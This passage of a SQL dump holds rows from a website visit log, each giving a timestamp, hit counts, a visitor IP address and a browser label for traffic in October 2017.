55.65.41','other'),(170624,1509006669,1,1,0,0,'217.182.132.23','other'),(170625,1509007551,1,1,0,0,'37.9.113.101','other'),(170626,1509007601,1,1,0,0,'188.255.50.81','msie'),(170627,1509008750,1,1,0,0,'91.196.178.162','chrome'),(170628,1509008789,1,1,0,0,'91.201.240.211','chrome'),(170629,1509008862,1,1,0,0,'51.255.65.48','other'),(170630,1509008867,1,1,0,0,'95.24.93.85','msie'),(170631,1509008985,1,1,0,0,'217.182.132.76','other'),(170632,1509009326,1,1,0,0,'109.63.187.114','msie'),(170633,1509009332,1,1,0,0,'95.220.116.215','msie'),(170634,1509009507,1,1,0,0,'217.182.132.85','other'),(170635,1509010206,1,1,0,0,'217.182.132.71','other'),(170636,1509010661,1,1,0,0,'82.207.91.234','other'),(170637,1509010736,1,1,0,0,'91.196.178.71','chrome'),(170638,1509010778,1,1,0,0,'157.55.39.157','other'),(170639,1509011003,1,1,0,0,'8.29.198.26','other'),(170640,1509011241,1,1,0,0,'217.182.132.71','other'),(170641,1509011857,1,1,0,0,'217.69.133.28','other'),(170642,1509012326,1,1,0,0,'217.69.133.23','other'),(170643,1509012782,1,1,0,0,'91.196.178.167','chrome'),(170644,1509013201,1,1,0,0,'164.132.162.188','other'),(170645,1509013548,1,1,0,0,'40.77.167.60','other'),(170646,1509013622,1,1,0,0,'217.182.132.193','other'),(170647,1509013671,1,1,0,0,'198.37.118.38','firefox'),(170648,1509014013,1,1,0,0,'217.182.132.94','other'),(170649,1509014347,1,1,0,0,'217.182.132.188','other'),(170650,1509015430,1,1,0,0,'217.182.132.22','other'),(170651,1509015510,2,2,0,0,'54.165.59.7','other'),(170652,1509015612,1,1,0,0,'51.255.65.59','other'),(170653,1509015685,1,1,0,0,'51.255.65.45','other'),(170654,1509015799,1,1,0,0,'188.163.16.6','chrome'),(170655,1509015997,1,1,0,0,'188.255.50.81','msie'),(170656,1509016058,1,1,0,0,'217.182.132.84','other'),(170657,1509016158,1,1,0,0,'164.132.162.188','other'),(170658,1509016488,1,1,0,0,'217.182.132.53','other'),(170659,1509016542,1,1,0,0,'217.182.132.175','other'),(170660,1509017165,1,1,0,0,'91.196.178.167','chrome'),(170661,1509017363,1,1,0,0,'91.196.178.164','chrome'),(170662,1509017768,45,45,0,0,'37.17.172.122','firefox'),(170663,1509017876,1,1,0,0,'217.69.133.236','other'),(170664,1509017904,1,1,0,0,'54.245.151.96','chrome'),(170665,1509017996,1,1,0,0,'217.182.132.56','other'),(170666,1509018048,1,1,0,0,'95.220.116.215','msie'),(170667,1509018162,1,1,0,0,'109.63.187.114','msie'),(170668,1509018359,1,0,1,0,'66.249.64.30',''),(170669,1509018457,1,1,0,0,'91.196.178.103','chrome'),(170670,1509018488,1,1,0,0,'164.132.162.164','other'),(170671,1509018637,1,1,0,0,'157.55.39.157','other'),(170672,1509018669,22,22,0,0,'37.17.172.122','firefox'),(170673,1509018685,1,1,0,0,'137.74.207.101','other'),(170674,1509018731,1,1,0,0,'51.255.65.15','other'),(170675,1509019079,1,1,0,0,'199.58.86.209','other'),(170676,1509019166,1,1,0,0,'89.163.131.166','chrome'),(170677,1509019284,1,1,0,0,'217.182.132.67','other'),(170678,1509019391,1,1,0,0,'78.111.190.216','chrome'),(170679,1509019438,1,1,0,0,'91.196.178.71','chrome'),(170680,1509020021,1,1,0,0,'91.196.178.71','firefox'),(170681,1509020436,1,1,0,0,'141.8.142.74','other'),(170682,1509020454,1,1,0,0,'95.134.203.185','chrome'),(170683,1509020560,1,0,1,0,'66.249.64.28',''),(170684,1509020829,1,0,1,0,'66.249.70.29',''),(170685,1509020973,1,1,0,0,'46.211.130.114','chrome'),(170686,1509021231,1,1,0,0,'217.182.132.51','other'),(170687,1509021302,1,1,0,0,'217.69.133.72','other'),(170688,1509021742,1,1,0,0,'164.132.162.153','other'),(170689,1509021781,1,1,0,0,'217.182.132.34','other'),(170690,1509021847,1,1,0,0,'8.29.198.25','other'),(170691,1509022178,1,1,0,0,'217.182.132.174','other'),(170692,1509022517,1,1,0,0,'157.55.39.157','other'),(170693,1509022583,1,1,0,0,'95.132.8.146','firefox'),(170694,1509023230,1,1,0,0,'217.69.133.246','other'),(170695,1509023360,1,1,0,0,'176.31.231.10','other'),(170696,1509023497,1,1,0,0,'51.255.65.4','other'),(170697,1509023512,1,1,0,0,'217.182.132.170','other'),(170698,1509023665,1,1,0,0,'188.255.50.81','msie'),(170699,1509023978,1,1,0,0,'91.196.178.131','firefox'),(170700,1509024181,1,1,0,0,'95.24.93.85','msie'),(170701,1509024563,1,1,0,0,'217.182.132.63','other'),(170702,1509025100,1,1,0,0,'91.196.177.15','chrome'),(170703,1509025492,1,1,0,0,'46.201.240.112','firefox'),(170704,1509025496,1,1,0,0,'77.222.155.89','chrome'),(170705,1509025570,1,1,0,0,'51.255.71.123','other'),(170706,1509026492,1,1,0,0,'51.255.65.95','other'),(170707,1509026923,1,1,0,0,'217.182.132.69','other'),(170708,1509027193,1,1,0,0,'37.55.32.85','chrome'),(170709,1509027295,1,1,0,0,'51.255.65.7','other'),(170710,1509027600,1,1,0,0,'217.182.132.187','other'),(170711,1509027619,1,1,0,0,'51.255.65.10','other'),(170712,1509027698,2,2,0,0,'141.8.142.74','other'),(170713,1509027898,1,1,0,0,'188.166.78.52','chrome'),(170714,1509027933,1,1,0,0,'173.234.234.205','other'),(170716,1509028112,1,1,0,0,'216.244.66.237','other'),(170717,1509028566,1,1,0,0,'178.154.171.88','other'),(170718,1509028611,1,0,1,0,'66.249.70.25',''),(170719,1509028758,1,1,0,0,'91.196.177.15','chrome'),(170720,1509028993,1,1,0,0,'95.132.25.181','firefox'),(170721,1509029098,1,1,0,0,'217.182.132.155','other'),(170722,1509029176,1,1,0,0,'51.255.71.130','other'),(170723,1509029241,1,0,1,0,'66.249.64.30',''),(170724,1509029501,1,1,0,0,'213.108.44.26','chrome'),(170725,1509030587,1,1,0,0,'51.255.65.36','other'),(170726,1509030612,1,1,0,0,'51.255.65.30','other'),(170727,1509030719,1,1,0,0,'164.132.164.180','other'),(170728,1509030916,1,1,0,0,'198.37.118.38','firefox'),(170729,1509031429,1,1,0,0,'217.182.132.52','other'),(170730,1509031599,1,1,0,0,'51.255.65.97','other'),(170731,1509031631,1,1,0,0,'51.255.65.49','other'),(170732,1509031774,1,1,0,0,'217.182.132.51','other'),(170733,1509031926,1,1,0,0,'217.182.132.64','other'),(170734,1509032197,1,1,0,0,'217.182.132.78','other'),(170735,1509032690,1,1,0,0,'8.29.198.26','other'),(170736,1509032759,1,1,0,0,'217.182.132.185','other'),(170737,1509032773,1,1,0,0,'178.154.171.81','other'),(170738,1509033285,3,3,0,0,'95.132.48.239','chrome'),(170739,1509034069,1,1,0,0,'79.164.156.204','firefox'),(170740,1509034075,1,1,0,0,'91.201.55.91','chrome'),(170741,1509034418,1,1,0,0,'51.255.71.115','other'),(170742,1509034655,1,1,0,0,'216.244.66.237','other'),(170743,1509035210,1,1,0,0,'217.182.132.27','other'),(170744,1509035599,1,1,0,0,'157.55.39.105','other'),(170745,1509035916,1,1,0,0,'217.182.132.74','other'),(170746,1509035931,1,1,0,0,'217.182.132.15','other'),(170747,1509036071,1,1,0,0,'78.111.186.207','chrome'),(170748,1509036603,1,1,0,0,'217.182.132.187','other'),(170749,1509037252,1,1,0,0,'137.74.207.116','other'),(170750,1509037546,1,0,1,0,'66.249.64.28',''),(170751,1509037566,1,0,1,0,'66.249.64.29',''),(170752,1509037627,1,1,0,0,'217.69.136.203','other'),(170753,1509037927,1,1,0,0,'137.74.207.120','other'),(170754,1509038014,1,0,1,0,'66.249.70.25',''),(170755,1509038038,1,1,0,0,'217.182.132.240','other'),(170756,1509038071,1,1,0,0,'91.201.55.91','chrome'),(170757,1509039089,2,2,0,0,'141.8.142.74','other'),(170758,1509039339,1,1,0,0,'217.182.132.18','other'),(170759,1509039497,1,1,0,0,'51.255.65.10','other'),(170760,1509039586,1,0,1,0,'66.249.64.28',''),(170761,1509039670,1,0,1,0,'66.249.70.29',''),(170762,1509039676,1,1,0,0,'51.255.65.5','other'),(170763,1509039835,1,1,0,0,'217.182.132.88','other'),(170764,1509040084,1,1,0,0,'66.249.70.29','chrome'),(170765,1509040092,1,1,0,0,'66.249.64.30','chrome'),(170766,1509040590,1,1,0,0,'137.74.207.120','other'),(170767,1509040602,1,1,0,0,'217.182.132.97','other'),(170768,1509040958,1,1,0,0,'51.255.71.120','other'),(170769,1509041220,1,1,0,0,'217.182.132.182','other'),(170770,1509041236,2,2,0,0,'87.250.224.46','other'),(170771,1509041259,1,1,0,0,'217.69.133.59','other'),(170772,1509041385,2,2,0,0,'66.249.64.29','chrome'),(170773,1509041443,1,1,0,0,'91.201.55.91','chrome'),(170774,1509041480,1,1,0,0,'195.238.117.139','chrome'),(170775,1509041565,2,2,0,0,'141.8.142.74','other'),(170776,1509041824,1,1,0,0,'217.182.132.15','other'),(170777,1509041889,2,0,2,0,'66.249.64.28',''),(170778,1509042528,1,1,0,0,'78.111.190.233','chrome'),(170779,1509042566,1,1,0,0,'217.182.132.50','other'),(170780,1509042624,1,1,0,0,'91.201.55.91','chrome'),(170781,1509042821,1,1,0,0,'51.255.65.48','other'),(170782,1509042859,1,1,0,0,'178.154.171.88','other'),(170783,1509042999,1,1,0,0,'51.255.65.16','other'),(170784,1509043111,1,1,0,0,'51.255.71.126','other'),(170785,1509043530,1,1,0,0,'8.29.198.27','other'),(170786,1509043642,1,1,0,0,'217.182.132.56','other'),(170787,1509043938,1,1,0,0,'137.74.207.119','other'),(170788,1509044035,1,1,0,0,'51.255.65.79','other'),(170789,1509044134,1,1,0,0,'178.154.171.88','other'),(170790,1509044141,1,1,0,0,'78.111.185.68','chrome'),(170791,1509044197,1,1,0,0,'51.255.71.100','other'),(170792,1509044554,1,1,0,0,'141.8.142.74','other'),(170793,1509044627,1,1,0,0,'51.255.65.4','other'),(170794,1509044953,1,1,0,0,'137.74.207.120','other'),(170795,1509045871,1,1,0,0,'51.255.65.78','other'),(170796,1509046339,1,1,0,0,'217.69.133.84','other'),(170797,1509046344,1,1,0,0,'217.182.132.79','other'),(170798,1509046600,1,1,0,0,'128.75.62.98','firefox'),(170799,1509046643,1,0,1,0,'66.249.70.27',''),(170800,1509046740,1,1,0,0,'51.255.71.101','other'),(170801,1509046818,1,1,0,0,'40.77.167.60','other'),(170802,1509047276,1,1,0,0,'51.255.71.131','other'),(170803,1509047604,1,1,0,0,'95.84.232.13','msie'),(170804,1509047783,2,0,2,0,'66.249.70.29',''),(170805,1509047809,1,0,1,0,'66.249.64.29',''),(170806,1509048291,1,1,0,0,'137.74.201.108','other'),(170807,1509048331,1,1,0,0,'37.9.113.182','other'),(170808,1509048585,1,1,0,0,'51.255.65.41','other'),(170809,1509048636,1,1,0,0,'195.238.108.89','firefox'),(170810,1509048820,1,1,0,0,'51.255.65.91','other'),(170811,1509049513,3,3,0,0,'141.8.142.74','other'),(170812,1509050233,1,1,0,0,'51.255.71.122','other'),(170813,1509050297,1,1,0,0,'217.182.132.60','other'),(170814,1509050385,1,1,0,0,'217.182.132.35','other'),(170815,1509050552,1,1,0,0,'141.8.142.74','other'),(170816,1509051211,1,1,0,0,'217.182.132.147','other'),(170817,1509051462,1,1,0,0,'178.154.171.88','other'),(170818,1509051646,1,1,0,0,'217.182.132.186','other'),(170819,1509051647,1,1,0,0,'51.255.65.97','other'),(170820,1509052129,1,1,0,0,'141.8.142.201','other'),(170821,1509052619,1,1,0,0,'217.182.132.85','other'),(170822,1509052998,1,1,0,0,'87.250.224.46','other'),(170823,1509053062,1,1,0,0,'51.255.65.33','other'),(170824,1509053185,1,1,0,0,'137.74.207.120','other'),(170825,1509053517,1,1,0,0,'217.182.132.29','other'),(170826,1509053942,1,1,0,0,'141.8.142.74','other'),(170827,1509054007,1,1,0,0,'217.69.133.228','other'),(170828,1509054132,1,1,0,0,'217.182.132.171','other'),(170829,1509054306,1,1,0,0,'199.58.86.211','other'),(170830,1509054360,1,1,0,0,'8.29.198.27','other'),(170831,1509054441,1,1,0,0,'51.255.65.24','other'),(170832,1509054901,1,1,0,0,'178.154.200.32','other'),(170833,1509055298,2,2,0,0,'178.154.171.88','other'),(170834,1509055953,1,1,0,0,'141.8.142.74','other'),(170835,1509056487,1,1,0,0,'51.255.65.53','other'),(170836,1509056873,1,1,0,0,'51.255.65.33','other'),(170837,1509056960,1,1,0,0,'51.255.65.74','other'),(170838,1509057422,1,1,0,0,'217.182.132.28','other'),(170839,1509057444,1,1,0,0,'141.8.142.74','other'),(170840,1509057742,1,1,0,0,'216.244.66.237','other'),(170841,1509057788,1,1,0,0,'217.182.132.35','other'),(170842,1509057944,1,1,0,0,'51.255.65.48','other'),(170843,1509058311,1,1,0,0,'37.9.113.115','other'),(170844,1509058470,1,1,0,0,'77.243.183.167','firefox'),(170845,1509058544,1,1,0,0,'51.255.65.70','other'),(170846,1509058666,1,1,0,0,'51.255.64.106','other'),(170847,1509059379,1,1,0,0,'137.74.207.114','other'),(170848,1509059619,1,1,0,0,'217.182.132.74','other'),(170849,1509059645,1,1,0,0,'178.154.171.88','other'),(170850,1509059665,1,1,0,0,'95.220.85.12','chrome'),(170851,1509059671,1,1,0,0,'51.255.71.100','other'),(170852,1509060228,1,1,0,0,'66.249.64.30','chrome'),(170853,1509060247,1,1,0,0,'51.255.65.11','other'),(170854,1509060299,2,2,0,0,'141.8.142.74','other'),(170855,1509060389,1,1,0,0,'217.182.132.75','other'),(170856,1509060548,1,1,0,0,'217.69.133.67','other'),(170857,1509060571,1,1,0,0,'217.69.133.72','other'),(170858,1509060899,1,1,0,0,'51.255.71.111','other'),(170859,1509061042,1,1,0,0,'37.9.113.182','other'),(170860,1509061365,1,0,1,0,'66.249.64.29',''),(170861,1509061811,4,4,0,0,'136.243.73.76','other'),(170862,1509062846,1,1,0,0,'66.249.64.29','chrome'),(170863,1509064190,1,1,0,0,'173.234.234.194','other'),(170864,1509064976,1,0,1,0,'66.249.70.27',''),(170865,1509065188,1,1,0,0,'8.29.198.27','other'),(170866,1509065358,1,1,0,0,'217.69.133.219','other'),(170867,1509066634,1,0,1,0,'66.249.64.28',''),(170868,1509067898,2,2,0,0,'141.8.142.74','other'),(170869,1509068043,1,1,0,0,'216.244.66.237','other'),(170870,1509068216,1,1,0,0,'178.154.171.88','other'),(170871,1509069120,1,0,1,0,'66.249.64.29',''),(170872,1509069882,1,1,0,0,'66.249.70.29','chrome'),(170873,1509070515,1,0,1,0,'66.249.64.29',''),(170874,1509070521,1,1,0,0,'178.154.171.88','other'),(170875,1509070649,2,2,0,0,'141.8.142.74','other'),(170876,1509070654,1,1,0,0,'217.69.133.222','other'),(170877,1509071588,1,1,0,0,'157.55.39.143','other'),(170878,1509071611,2,1,1,0,'66.249.64.29',''),(170879,1509072219,1,1,0,0,'178.154.171.88','other'),(170880,1509072993,1,1,0,0,'141.8.142.74','other'),(170881,1509073483,1,1,0,0,'217.69.136.204','other'),(170882,1509073954,1,1,0,0,'91.201.55.91','chrome'),(170883,1509075272,2,2,0,0,'141.8.142.74','other'),(170884,1509075449,1,1,0,0,'37.9.113.182','other'),(170885,1509075480,1,0,1,0,'66.249.70.27',''),(170886,1509075505,1,1,0,0,'87.250.224.46','other'),(170887,1509076011,1,1,0,0,'8.29.198.26','other'),(170888,1509076418,1,1,0,0,'217.69.133.84','other'),(170889,1509076541,1,1,0,0,'141.8.142.74','other'),(170890,1509076923,1,1,0,0,'5.45.207.83','other'),(170891,1509077179,1,1,0,0,'66.249.70.25','chrome'),(170892,1509077588,1,1,0,0,'66.249.70.27','chrome'),(170893,1509077674,1,1,0,0,'157.55.39.157','other'),(170894,1509077930,2,2,0,0,'141.8.142.74','other'),(170895,1509078299,1,1,0,0,'217.69.133.215','other'),(170896,1509078877,1,1,0,0,'164.132.162.154','other'),(170897,1509078885,1,0,1,0,'66.249.70.25',''),(170898,1509078896,1,1,0,0,'217.182.132.240','other'),(170899,1509078899,1,1,0,0,'141.8.142.74','other'),(170900,1509079156,1,1,0,0,'178.154.171.88','other'),(170901,1509079271,1,1,0,0,'51.255.65.42','other'),(170902,1509079334,1,1,0,0,'137.74.207.102','other'),(170903,1509079383,1,1,0,0,'51.255.71.120','other'),(170904,1509079405,1,1,0,0,'51.255.71.122','other'),(170905,1509079467,1,0,1,0,'66.249.64.29',''),(170906,1509079663,1,1,0,0,'51.255.65.88','other'),(170907,1509080147,1,1,0,0,'217.182.132.37','other'),(170908,1509080223,1,1,0,0,'176.31.231.10','other'),(170909,1509080247,1,1,0,0,'217.182.132.75','other'),(170910,1509080282,1,1,0,0,'217.69.133.223','other'),(170911,1509080285,2,2,0,0,'141.8.142.74','other'),(170912,1509080690,1,1,0,0,'51.255.65.85','other'),(170913,1509080783,1,1,0,0,'217.182.132.64','other'),(170914,1509081197,1,1,0,0,'217.182.132.94','other'),(170915,1509081678,1,1,0,0,'216.244.66.237','other'),(170916,1509082394,1,1,0,0,'66.249.70.25','chrome'),(170917,1509082400,2,1,1,0,'66.249.64.29',''),(170918,1509082413,1,1,0,0,'51.255.65.73','other'),(170919,1509082425,1,1,0,0,'217.182.132.4','other'),(170920,1509082603,1,1,0,0,'66.249.64.28','chrome'),(170921,1509082646,1,1,0,0,'95.132.49.215','firefox'),(170922,1509082720,1,1,0,0,'141.8.142.74','other'),(170923,1509082733,1,1,0,0,'217.182.132.25','other'),(170924,1509082832,1,1,0,0,'46.133.5.209','chrome'),(170925,1509083027,1,1,0,0,'217.69.133.226','other'),(170926,1509083391,1,1,0,0,'82.145.220.36','chrome'),(170927,1509083495,1,1,0,0,'46.118.69.218','firefox'),(170928,1509083701,1,1,0,0,'51.255.65.85','other'),(170929,1509083731,1,1,0,0,'217.69.133.239','other'),(170930,1509084031,1,1,0,0,'51.255.65.96','other'),(170931,1509084238,1,1,0,0,'91.196.179.138','chrome'),(170932,1509084318,1,0,1,0,'66.249.70.27',''),(170933,1509084901,1,1,0,0,'217.69.133.220','other'),(170934,1509085006,1,1,0,0,'213.108.44.26','chrome'),(170935,1509085015,1,1,0,0,'217.69.133.85','other'),(170936,1509085379,1,1,0,0,'188.163.16.6','chrome'),(170937,1509086057,1,1,0,0,'164.132.162.187','other'),(170938,1509086553,1,1,0,0,'51.255.65.48','other'),(170939,1509086639,1,1,0,0,'217.182.132.193','other'),(170940,1509086841,1,1,0,0,'8.29.198.26','other'),(170941,1509086929,1,1,0,0,'51.255.71.121','other'),(170942,1509086959,1,1,0,0,'180.76.15.21','other'),(170943,1509086971,1,1,0,0,'37.55.32.85','chrome'),(170944,1509086982,2,2,0,0,'178.154.171.88','other'),(170945,1509087215,1,1,0,0,'66.249.70.27','chrome'),(170946,1509087274,1,1,0,0,'157.55.39.143','other'),(170947,1509087649,1,1,0,0,'217.182.132.68','other'),(170948,1509087768,1,1,0,0,'51.255.65.76','other'),(170949,1509088124,1,1,0,0,'178.154.171.88','other'),(170950,1509088626,1,1,0,0,'164.132.162.155','other'),(170951,1509088777,1,1,0,0,'217.69.136.207','other'),(170952,1509088871,1,1,0,0,'217.182.132.79','other'),(170953,1509089043,1,1,0,0,'51.255.65.69','other'),(170955,1509089195,3,1,2,0,'66.249.70.27',''),(170956,1509089198,1,1,0,0,'66.249.64.28','chrome'),(170957,1509089526,1,1,0,0,'51.255.65.38','other'),(170958,1509089542,1,1,0,0,'51.255.71.110','other'),(170959,1509090478,1,1,0,0,'51.255.71.122','other'),(170960,1509090764,1,1,0,0,'95.28.49.214','msie'),(170961,1509090826,1,1,0,0,'217.69.133.30','other'),(170962,1509090883,1,1,0,0,'217.182.132.37','other'),(170963,1509090972,1,1,0,0,'51.255.65.32','other'),(170964,1509091211,1,1,0,0,'164.132.162.187','other'),(170965,1509091734,1,1,0,0,'185.137.18.27','chrome'),(170966,1509091807,1,1,0,0,'82.207.91.234','other'),(170967,1509091817,1,0,1,0,'66.249.70.27',''),(170968,1509092010,1,1,0,0,'66.249.70.25','chrome'),(170969,1509092176,1,1,0,0,'217.182.132.70','other'),(170970,1509092346,1,1,0,0,'137.74.203.194','other'),(170971,1509092573,1,1,0,0,'141.8.142.74','other'),(170972,1509092613,1,1,0,0,'151.80.27.118','other'),(170973,1509092764,1,1,0,0,'66.249.64.28','chrome'),(170974,1509092770,1,0,1,0,'66.249.70.29',''),(170975,1509093363,1,0,1,0,'66.249.64.29',''),(170976,1509093501,1,1,0,0,'51.255.65.77','other'),(170977,1509093549,1,1,0,0,'180.76.15.147','other'),(170978,1509093560,1,1,0,0,'51.255.65.57','other'),(170979,1509093808,1,1,0,0,'217.69.133.242','other'),(170980,1509093818,1,1,0,0,'66.249.64.28','chrome'),(170981,1509094061,1,1,0,0,'217.182.132.74','other'),(170982,1509094199,1,1,0,0,'173.234.234.214','other'),(170983,1509094625,1,1,0,0,'91.196.178.166','chrome'),(170984,1509094931,1,1,0,0,'217.182.132.31','other'),(170985,1509095174,1,1,0,0,'95.132.83.126','msie'),(170986,1509095251,1,1,0,0,'217.77.209.134','chrome'),(170987,1509095591,2,0,2,0,'66.249.64.30',''),(170988,1509096002,1,1,0,0,'91.196.179.138','chrome'),(170989,1509096004,1,1,0,0,'176.31.231.10','other'),(170990,1509096250,2,0,2,0,'66.249.64.29',''),(170991,1509096340,1,1,0,0,'137.74.207.119','other'),(170992,1509096891,1,1,0,0,'5.45.207.58','other'),(170993,1509096952,1,1,0,0,'40.77.167.60','other'),(170994,1509097058,1,1,0,0,'91.196.178.71','chrome'),(170995,1509097087,1,1,0,0,'91.196.178.67','firefox'),(170996,1509097115,1,1,0,0,'91.196.178.67','chrome'),(170997,1509097662,1,1,0,0,'8.29.198.26','other'),(170998,1509097742,1,1,0,0,'217.182.132.60','other'),(170999,1509098057,1,1,0,0,'51.255.65.50','other'),(171000,1509098103,1,0,1,0,'66.249.70.27',''),(171001,1509098201,1,1,0,0,'66.249.64.28','chrome'),(171002,1509098261,1,1,0,0,'91.196.178.71','chrome'),(171003,1509098655,2,2,0,0,'91.195.97.7','other'),(171004,1509098749,1,1,0,0,'91.196.177.15','chrome'),(171005,1509098772,1,1,0,0,'91.124.12.127','opera'),(171006,1509099031,1,1,0,0,'217.69.133.28','other'),(171007,1509099210,1,1,0,0,'137.74.207.188','other'),(171008,1509099338,1,1,0,0,'188.166.60.10','chrome'),(171009,1509099414,1,1,0,0,'46.200.123.187','chrome'),(171010,1509099647,1,1,0,0,'40.77.167.109','other'),(171011,1509100151,1,1,0,0,'217.69.133.243','other'),(171012,1509100222,1,1,0,0,'217.69.136.204','other'),(171013,1509100266,1,1,0,0,'51.255.71.127','other'),(171014,1509100345,2,2,0,0,'91.209.11.236','other'),(171015,1509100614,1,1,0,0,'217.182.132.7','other'),(171016,1509100631,1,1,0,0,'141.8.142.74','other'),(171017,1509100645,1,1,0,0,'51.255.71.131','other'),(171018,1509100663,1,1,0,0,'178.92.74.185','chrome'),(171019,1509100997,1,1,0,0,'217.182.132.61','other'),(171020,1509101146,1,1,0,0,'217.69.136.205','other'),(171021,1509101409,1,1,0,0,'217.182.132.17','other'),(171022,1509101457,1,1,0,0,'51.255.65.79','other'),(171023,1509101462,1,1,0,0,'91.201.55.91','chrome'),(171024,1509101622,1,1,0,0,'51.255.71.126','other'),(171025,1509101786,1,1,0,0,'178.92.74.185','chrome'),(171026,1509101811,1,1,0,0,'51.255.65.81','other'),(171027,1509102028,1,1,0,0,'51.255.71.131','other'),(171028,1509102183,2,2,0,0,'87.250.224.46','other'),(171029,1509102273,1,1,0,0,'217.69.133.244','other'),(171030,1509102343,1,1,0,0,'141.8.142.74','other'),(171031,1509102618,1,1,0,0,'216.244.66.237','other'),(171032,1509102705,1,1,0,0,'217.69.133.15','other'),(171033,1509102844,1,1,0,0,'176.31.231.10','other'),(171034,1509103047,1,1,0,0,'37.52.23.163','opera'),(171035,1509103159,1,1,0,0,'178.154.171.88','other'),(171036,1509103637,1,1,0,0,'178.92.74.185','chrome'),(171037,1509103893,1,1,0,0,'51.255.65.51','other'),(171038,1509104046,2,2,0,0,'141.8.142.74','other'),(171039,1509104232,1,1,0,0,'91.196.178.165','chrome'),(171040,1509104482,1,1,0,0,'91.196.178.168','chrome'),(171041,1509104504,1,1,0,0,'217.182.132.92','other'),(171042,1509104521,1,1,0,0,'137.74.201.100','other'),(171043,1509104651,1,1,0,0,'87.250.224.46','other'),(171044,1509104698,1,1,0,0,'51.255.71.111','other'),(171045,1509104714,1,1,0,0,'217.182.132.85','other'),(171046,1509105030,1,1,0,0,'66.249.64.29','chrome'),(171047,1509105038,1,1,0,0,'51.255.65.26','other'),(171048,1509105136,1,1,0,0,'178.92.74.185','chrome'),(171049,1509105480,1,1,0,0,'91.196.178.168','chrome'),(171050,1509105514,1,0,1,0,'66.249.70.29',''),(171051,1509105639,1,1,0,0,'217.182.132.172','other'),(171052,1509105814,1,1,0,0,'37.73.209.216','chrome'),(171053,1509105836,1,0,1,0,'66.249.70.27',''),(171054,1509105858,1,1,0,0,'164.132.162.159','other'),(171055,1509106010,1,1,0,0,'91.196.178.72','chrome'),(171056,1509106287,1,1,0,0,'82.145.221.193','chrome'),(171057,1509106459,1,1,0,0,'51.255.65.28','other'),(171058,1509106497,1,1,0,0,'51.255.65.96','other'),(171059,1509106558,1,1,0,0,'51.255.71.132','other'),(171060,1509106755,1,1,0,0,'217.69.133.219','other'),(171061,1509106958,1,1,0,0,'51.255.65.18','other'),(171062,1509107149,2,2,0,0,'91.196.178.168','chrome'),(171063,1509107329,2,2,0,0,'92.169.146.8','other'),(171064,1509107336,2,2,0,0,'195.14.0.8','other'),(171065,1509108483,1,1,0,0,'8.29.198.27','other'),(171066,1509108842,1,1,0,0,'141.8.142.74','other'),(171067,1509108955,1,1,0,0,'178.154.171.88','other'),(171068,1509109120,1,1,0,0,'164.132.164.180','other'),(171069,1509109169,1,1,0,0,'217.182.132.5','other'),(171070,1509109496,1,1,0,0,'77.126.93.249','chrome'),(171071,1509109674,1,1,0,0,'5.76.153.177','chrome'),(171072,1509109765,1,1,0,0,'78.84.130.226','chrome'),(171073,1509109784,1,1,0,0,'141.8.142.74','other'),(171074,1509109978,1,1,0,0,'66.249.64.29','chrome'),(171075,1509110257,1,1,0,0,'217.182.132.29','other'),(171076,1509110386,1,1,0,0,'51.255.65.80','other'),(171077,1509110657,1,1,0,0,'178.154.171.88','other'),(171078,1509110672,1,1,0,0,'146.120.26.107','chrome'),(171079,1509110771,1,1,0,0,'91.196.177.46','other'),(171080,1509110984,1,1,0,0,'51.255.65.93','other'),(171081,1509111188,1,0,1,0,'66.249.64.28',''),(171082,1509111207,1,1,0,0,'51.255.65.224','other'),(171083,1509111367,1,1,0,0,'51.255.71.112','other'),(171084,1509112196,2,2,0,0,'142.44.151.76','other'),(171085,1509112311,1,1,0,0,'217.182.132.97','other'),(171086,1509112317,1,1,0,0,'137.74.207.116','other'),(171087,1509112464,1,0,1,0,'66.249.64.29',''),(171088,1509112487,1,0,1,0,'66.249.70.29',''),(171089,1509112577,1,1,0,0,'37.9.113.101','other'),(171090,1509112580,1,1,0,0,'178.154.171.24','other'),(171091,1509112691,1,0,1,0,'66.249.70.27',''),(171092,1509113083,1,1,0,0,'87.250.224.46','other'),(171093,1509113634,1,1,0,0,'217.182.132.157','other'),(171094,1509113817,1,0,1,0,'66.249.70.27',''),(171095,1509113829,1,1,0,0,'141.8.142.74','other'),(171096,1509114026,1,1,0,0,'66.249.64.28','chrome'),(171097,1509114206,1,1,0,0,'80.252.154.233','chrome'),(171098,1509114472,1,1,0,0,'40.77.167.60','other'),(171099,1509114526,1,1,0,0,'188.166.13.45','chrome'),(171100,1509115486,1,1,0,0,'178.154.200.7','other'),(171101,1509115556,2,1,1,0,'66.249.70.29',''),(171102,1509115626,1,1,0,0,'198.37.118.38','firefox'),(171103,1509116049,1,1,0,0,'35.184.189.105','other'),(171104,1509116216,1,1,0,0,'37.9.113.56','other'),(171105,1509116234,1,1,0,0,'91.196.178.167','chrome'),(171106,1509117097,1,1,0,0,'95.27.67.99','msie'),(171107,1509117269,5,5,0,0,'142.4.200.37','other'),(171108,1509117484,1,0,1,0,'66.249.64.30',''),(171109,1509117515,1,1,0,0,'178.154.171.4','other'),(171110,1509117564,1,1,0,0,'40.77.167.109','other'),(171111,1509117619,2,1,1,0,'66.249.64.30',''),(171112,1509117947,1,1,0,0,'188.163.16.6','chrome'),(171113,1509118121,1,1,0,0,'107.167.108.19','other'),(171114,1509118461,1,1,0,0,'204.79.180.13','msie'),(171115,1509118528,1,1,0,0,'217.182.132.147','other'),(171116,1509118614,1,1,0,0,'82.145.220.36','chrome'),(171117,1509118683,1,1,0,0,'217.182.132.97','other'),(171118,1509118786,1,1,0,0,'37.229.82.110','firefox'),(171119,1509118788,1,1,0,0,'95.132.24.93','firefox'),(171120,1509118852,1,1,0,0,'188.163.16.6','chrome'),(171121,1509118995,1,1,0,0,'217.182.132.175','other'),(171122,1509119226,1,1,0,0,'82.145.222.135','chrome'),(171123,1509119312,1,1,0,0,'8.29.198.25','other'),(171124,1509119450,1,1,0,0,'66.249.70.27','chrome'),(171125,1509119580,1,1,0,0,'91.196.178.162','chrome'),(171126,1509119946,1,1,0,0,'217.182.132.175','other'),(171127,1509119958,1,1,0,0,'141.8.142.74','other'),(171128,1509120595,1,1,0,0,'217.69.133.15','other'),(171129,1509120597,1,1,0,0,'217.69.133.18','other'),(171130,1509120912,1,1,0,0,'180.76.15.33','other'),(171131,1509120953,1,1,0,0,'217.182.132.193','other'),(171132,1509121866,1,1,0,0,'51.255.65.97','other'),(171133,1509122070,1,1,0,0,'217.182.132.172','other'),(171134,1509122128,1,1,0,0,'178.92.74.185','chrome'),(171135,1509122225,1,1,0,0,'91.196.178.131','chrome'),(17113